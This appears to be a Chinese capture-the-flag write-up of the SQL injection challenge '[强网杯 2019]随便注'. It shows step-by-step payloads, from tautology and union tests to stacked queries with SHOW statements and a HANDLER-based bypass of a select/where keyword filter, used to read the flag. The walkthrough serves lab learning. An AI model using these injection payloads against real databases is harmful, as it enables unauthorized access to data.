当前位置: 首页 > news >正文

【BUUCTF系列】[强网杯 2019]随便注

news 2026/3/27 0:26:46

这是一道sql注入题目

先输入1看看

显示了一些不知道什么东西

尝试1' or 1=1 #万能密码

看上去也没有一些有用的信息

然后尝试 联合注入查询

1' ORDER BY 3#

也没有什么有用的

尝试union注入

1' union select 1,2#

这里回显了被过滤的关键词,很明显后端把selectwhere这些核心关键字都加入了过滤规则。

先用show databases爆破数据库

'

看来有用

然后进一步show tables爆破表

看到了有个"数字串"的表和"word"表

1'; show columns from words; #
1'; show columns from `1919810931114514`; #

分别爆破这两个表看看 column列

再数字的表里面看到了flag

由于过滤了where select等字段 所以需要绕过这些字段 再不断尝试和学习 加上之前的积累

使用

1';HANDLER FlagHere OPEN; HANDLER FlagHere READ FIRST; HANDLER FlagHere CLOSE;#

注入后就可以得到flag

http://www.jsqmd.com/news/74278/

相关文章:

  • Wan2.2-T2V-A14B支持多语言文本理解,全球化创作新利器
  • 解锁Wan2.2-T2V-A14B隐藏功能:高级提示词工程技巧
  • 【边缘Agent部署终极指南】:Docker轻量级实战技巧全揭秘
  • (甲基化研究必备技能)R语言实现CpG位点注释与功能富集分析全流程解析
  • N皇后问题
  • 谷城县这家家电门店,竟藏着最全产品,你去过吗?
  • NVIDIA显卡性能调校深度探索:解锁隐藏配置的艺术
  • 如何利用Wan2.2-T2V-A14B生成时序连贯的长视频片段?
  • 11、MobX实战应用与特殊API解析
  • 12、MobX特殊API与实用工具深度解析
  • 13、探索 mobx-utils 和 mobx-state-tree
  • Wan2.2-T2V-A14B在跨境电商产品展示视频中的多语言适配优势
  • Wan2.2-T2V-A14B能否生成自然灾害模拟视频?应急管理培训素材制作
  • 这道LeetCode Hard题,用一个转化思想就变简单了
  • 从“调参侠“到“炼丹大师“!16种大模型微调秘籍全解锁,小白也能玩转LLM定制开发
  • 通义千问凭借“门控注意力”斩获 NeurIPS 最佳论文奖!详解Gated Attention原理
  • 开源语音合成新选择:Chatterbox TTS API赋能开发者的文本转语音解决方案
  • 80亿参数改写AI应用规则:Qwen3-VL-8B-Thinking-bnb-4bit如何开启多模态普惠时代
  • HarmonyOS 6.0 ArkWeb开发实战:从基础到进阶的ArkUI+ArkTS实践
  • Agent原理、主流框架、设计模式及应用案例
  • LLM代码评审Agent实战:基于Qwen3-Coder与RAG的企业级应用!
  • 零基础逆袭大模型!全网最细LLM学习路线图,从入门到精通一篇搞定,超详细!
  • 从加密到解析仅需2分钟:Dify自动化PDF处理黑科技曝光
  • 国内大模型产业突破:ERNIE 4.5 技术创新引领行业智能化升级新范式
  • 上海人工智能实验室安全团队实习生/全职招聘
  • 算力、模型、生态:亚马逊云科技云创计划,深度学习创业者的硬核“加速器”
  • RL并非万能药:CMU 新论文揭秘大模型推理能力的真正来源
  • 【限时关注】金融行业加密标准解读:PHP如何合规实现非对称加密
  • 【JAVA项目】基于JAVA的医院管理系统
  • Gemma 3 12B It GGUF:Google量化模型本地部署全解析与应用指南